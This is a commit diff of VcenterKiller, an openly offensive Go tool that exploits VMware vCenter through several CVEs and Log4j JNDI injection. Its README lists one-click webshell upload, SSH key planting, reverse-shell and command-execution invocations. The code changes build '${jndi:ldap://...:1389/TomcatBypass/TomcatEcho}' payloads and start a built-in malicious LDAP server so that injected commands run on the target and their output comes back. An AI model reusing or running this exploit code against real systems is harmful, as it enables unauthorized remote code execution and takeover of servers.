1.3.5

Schira4396 · Oct 15, 2022 · c286282 · c286282
1 parent de3ef02
commit c286282
Show file tree

Hide file tree

Showing 6 changed files with 105 additions and 35 deletions.
diff --git a/README.md b/README.md
@@ -3,21 +3,13 @@
 
 # VcenterKiller
 #### 0.必读
-目前本工具处于刚上线阶段，可能会有很多BUG，如果遇到bug请提issue
-
-
-
-写这个工具单纯是为了方便，它没有什么高大上的东西
-
-
-
-目前集成了对Vcenter log4j漏洞的检测和利用功能，思路来自于带哥[@j5s](https://github.com/j5s)的项目[SuperFastjsonScan](https://github.com/j5s/SuperFastjsonScan)，原理参考[Golang实现RMI协议自动化检测Fastjson](https://www.anquanke.com/post/id/249402)，简单来说就是不借助dnslog之类的平台，只要你和目标主机是通的并且你的主机/跳板没有被防火墙做端口限制，那就能直接验证目标是否进行了远程调用。
+如果遇到bug请提issue，写这个工具单纯是为了方便，它没有什么高大上的东西
 
 
 
 #### 1.它是什么
 
-一款针对Vcenter（暂时）的综合**验证**工具，包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005，提供一键上传webshell，命令执行或者上传公钥并使用SSH连接的功能，以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用，比如命令执行并获取回显（需要一个ldap恶意服务器）。
+一款针对Vcenter的综合**验证**工具，包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005，提供一键上传webshell，命令执行或者上传公钥并使用SSH连接的功能，以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用，比如命令执行并获取回显（~~需要一个ldap恶意服务器~~），现在不需要另外启动ldap服务器了，我根据jndi-injection工具手搓了一个利用方式，Vcenter使用的中间件是Tomcat，直接使用TomcatBypass的利用链就行了。
 
 #### 2.它的定位
 
@@ -36,8 +28,7 @@ go build -o main.exe
 ./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥
 ./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
 ./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j
-./main.exe -u https://192.168.1.1 -m log4center -t rshell -r rmi://xx.xx.xx.xx:1099/xx //get reverseshell and other
-./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //execute command
+./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务
 ./main.exe -u https://xx.xx.com -m 22954 whoami
 ./main.exe -u https://xx.xx.com -m 22972 //get cookie
 ./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656
@@ -62,6 +53,7 @@ V1.3.1 修复了检测log4j时忽略了端口的问题，有的服务会更改
 V1.3.2 修改了针对log4j的利用方式，通过tomcatbypassEcho的方式执行命令并获取回显。vcenter 7.0 linux测试通过。
 V1.3.3 增加了对6.7和7.0版本的区别利用，7.0必须使用tomcatbypass，而6.7使用普通的basic就行了
 v1.3.4 修改了对log4j的验证逻辑，目前的逻辑是循环5次不同payload无差别乱打，有回显就有，没有就没有
+v1.3.5 消除了log4j对Jndi-Injection-Exploit的依赖，能够直接执行命令并获取回显
 ...
 ```
 
diff --git a/go.mod b/go.mod
@@ -13,6 +13,7 @@ require (
 	github.com/hashicorp/errwrap v1.1.0 // indirect
 	github.com/hashicorp/go-multierror v1.1.1 // indirect
 	github.com/imroc/req/v3 v3.24.0 // indirect
+	github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 // indirect
 	github.com/lucas-clemente/quic-go v0.28.1 // indirect
 	github.com/marten-seemann/qpack v0.2.1 // indirect
 	github.com/marten-seemann/qtls-go1-16 v0.1.5 // indirect
@@ -23,6 +24,7 @@ require (
 	github.com/mattn/go-isatty v0.0.14 // indirect
 	github.com/nxadm/tail v1.4.8 // indirect
 	github.com/onsi/ginkgo v1.16.5 // indirect
+	github.com/vjeantet/ldapserver v1.0.1 // indirect
 	golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa // indirect
 	golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4 // indirect
 	golang.org/x/net v0.0.0-20220802222814-0bcc04d9c69b // indirect

diff --git a/go.sum b/go.sum
@@ -86,6 +86,8 @@ github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORN
 github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
 github.com/kr/pty v1.1.3/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
 github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
+github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 h1:wIONC+HMNRqmWBjuMxhatuSzHaljStc4gjDeKycxy0A=
+github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3/go.mod h1:37YR9jabpiIxsb8X9VCIx8qFOjTDIIrIHHODa8C4gz0=
 github.com/lucas-clemente/quic-go v0.28.1 h1:Uo0lvVxWg5la9gflIF9lwa39ONq85Xq2D91YNEIslzU=
 github.com/lucas-clemente/quic-go v0.28.1/go.mod h1:oGz5DKK41cJt5+773+BSO9BXDsREY4HLf7+0odGAPO0=
 github.com/lunixbochs/vtclean v1.0.0/go.mod h1:pHhQNgMf3btfWnGBVipUOjRYhoOsdGqdm/+2c2E2WMI=
@@ -163,6 +165,8 @@ github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5
 github.com/tarm/serial v0.0.0-20180830185346-98f6abe2eb07/go.mod h1:kDXzergiv9cbyO7IOYJZWg1U88JhDg3PB6klq9Hg2pA=
 github.com/viant/assertly v0.4.8/go.mod h1:aGifi++jvCrUaklKEKT0BU95igDNaqkvz+49uaYMPRU=
 github.com/viant/toolbox v0.24.0/go.mod h1:OxMCG57V0PXuIP2HNQrtJf2CjqdmbrOx5EkMILuUhzM=
+github.com/vjeantet/ldapserver v1.0.1 h1:3z+TCXhwwDLJC3pZCNbuECPDqC2x1R7qQQbswB1Qwoc=
+github.com/vjeantet/ldapserver v1.0.1/go.mod h1:YvUqhu5vYhmbcLReMLrm/Tq3S7Yj43kSVFvvol6Lh6k=
 github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
 github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k=
 github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY=

diff --git a/main.go b/main.go
@@ -117,7 +117,10 @@ func main() {
 					usage()
 					os.Exit(0)
 				} else {
+
+					go log4jcenter.Start_server()
 					log4jcenter.Execc(url, rmi, command)
+
 				}
 
 			} else {

diff --git a/src/log4jcenter/log4j.go b/src/log4jcenter/log4j.go
@@ -130,26 +130,28 @@ func exploit(url, rmiserver string) {
 
 }
 
-func exec_cmd(url, rmiserver, command, version string) (bool, string) {
-	host := rmiserver
+func exec_cmd(url, rmiserver, command, cmd, uri string) (bool, string) {
+	host := ""
+	if rmiserver == "" {
+		target := strings.TrimLeft(url, "https://")
+		host = getIpAddr2(target)
+		// fmt.Println(host)
+	} else {
+		host = rmiserver
+	}
+
 	client := req.C()
 	client.EnableForceHTTP1()
 	// client.DisableAutoReadResponse()
 	// client.SetUnixSocket("1.sock")
 	client.EnableInsecureSkipVerify()
 	client.DisableAutoReadResponse()
-	client.SetTimeout(4 * time.Second)
+	client.SetTimeout(2 * time.Second)
 	// client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理，burp2022.8会启用http2，导致vcenter报错403
 	rmi_server := ""
-	cmd := ""
-	if version == "6" {
-		rmi_server = fmt.Sprintf("${jndi:%s/Basic/TomcatEcho}", host)
-		cmd = command + " && echo nmsl"
-	} else {
-		rmi_server = fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host)
-		cmd = command + ";echo 'nmsl'"
-	}
-	_ = cmd
+	cmd = command + cmd
+	rmi_server = fmt.Sprintf("${jndi:ldap://%s:1389%s}", host, uri)
+	// fmt.Println(rmi_server)
 	myheader := map[string]string{
 		"User-Agent":                "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
 		"Accept":                    "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
@@ -203,18 +205,18 @@ func exec_cmd(url, rmiserver, command, version string) (bool, string) {
 }
 
 func Execc(url, rmiserver, command string) {
-	for i := 0; i < 5; i++ {
-		temp1, temp2 := exec_cmd(url, rmiserver, command, "7")
-		if temp1 {
-			fmt.Println(temp2)
-			return
-		}
-		temp3, temp4 := exec_cmd(url, rmiserver, command, "6")
-		if temp3 {
-			fmt.Println(temp4)
-			return
-		}
+
+	temp1, temp2 := exec_cmd(url, rmiserver, command, ";echo nmsl", "/TomcatBypass/TomcatEcho")
+	if temp1 {
+		fmt.Println(temp2)
+		return
+	}
+	temp3, temp4 := exec_cmd(url, rmiserver, command, " && echo nmsl", "/TomcatBypass/TomcatEcho")
+	if temp3 {
+		fmt.Println(temp4)
+		return
 	}
+
 	fmt.Println("[-] 利用失败或不存在漏洞.")
 }